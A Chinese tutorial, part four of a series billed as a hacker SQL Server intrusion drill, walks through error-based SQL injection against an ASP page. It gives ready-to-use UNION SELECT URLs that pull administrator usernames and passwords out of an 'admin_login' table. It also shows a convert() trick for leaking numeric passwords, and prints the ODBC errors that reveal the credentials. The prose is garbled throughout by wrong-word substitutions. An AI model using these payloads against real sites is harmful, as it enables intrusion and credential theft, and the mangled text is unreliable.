黑客SQL服务器入侵实战演习(四)
6.2如何找到我们需要的数据?
如今我们需要辨别出一些比较紧张的表与列,我们可以用雷同的本领询问数据库从而得到相干的信息。
如今让我们问问"admin_login"表的第一个用户名是什么吧:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
输入:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ' neo' to a column of data type int.
/index.asp, line 5
知道了一个办理员帐号是"neo"。末了,问问这个办理员帐号的密码是什么吧:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='
neo'--
输入:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '
m4trix' to a column of data type int.
/index.asp, line 5
如今我们可以用"neo"与他的密码("m4trix")来登岸体系了。
6.3如何得到数字串值?
在这里技能上表达的一种局限性。若要将数字(0-9之间的数字)转换为正常的文本数据的话,我们将无法得到我们所需要的错误提示信息。举个例子,我们如今要实验得到帐号为"trinity"的密码,而它所对应的密码为"31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='
trinity'--
这样我们大约只能得到“Page Not Found”这样的错误提示。这此中的主要题目在于,在与整数(这个例子中为10)进行了合集(利用了UNION子句)当前这个密码"31173"将会被体系转换为数值。这样的话这个UNION字句挪用就是‘合法’的了,SQL办事器将不会前往任何ODBC错误信息,因而我们是不行能得到这些数字型数据的。
为了办理这个题目,我们可以为这些数据字符串加入一些字母表来确定转化过程是错误的。让我们尝尝
用上面的这条请求来取代原来的请求吧:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM
admin_login where login_name='trinity'--
在这里我们只不外是加入了一个(+)加号与其它我们想加入的字符进去罢了(在ASCII中'+'等于0x2b)。我们加入了一个(%20)空格与morpheus(随便一个字符串)进入现实的密码数据中。这样的话,纵然我们得到了数字串'31173',它也会酿成'31173 morpheus'。
在执行了convert()函数后,体系会实验将'31173 morpheus'转换为整数型,SQL办事器一定会前往这样的ODBC错误信息:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '
31173 morpheus' to a column of data type int.
/index.asp, line 5
如今你可以知道'trinity'的密码是'31173'了吧。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
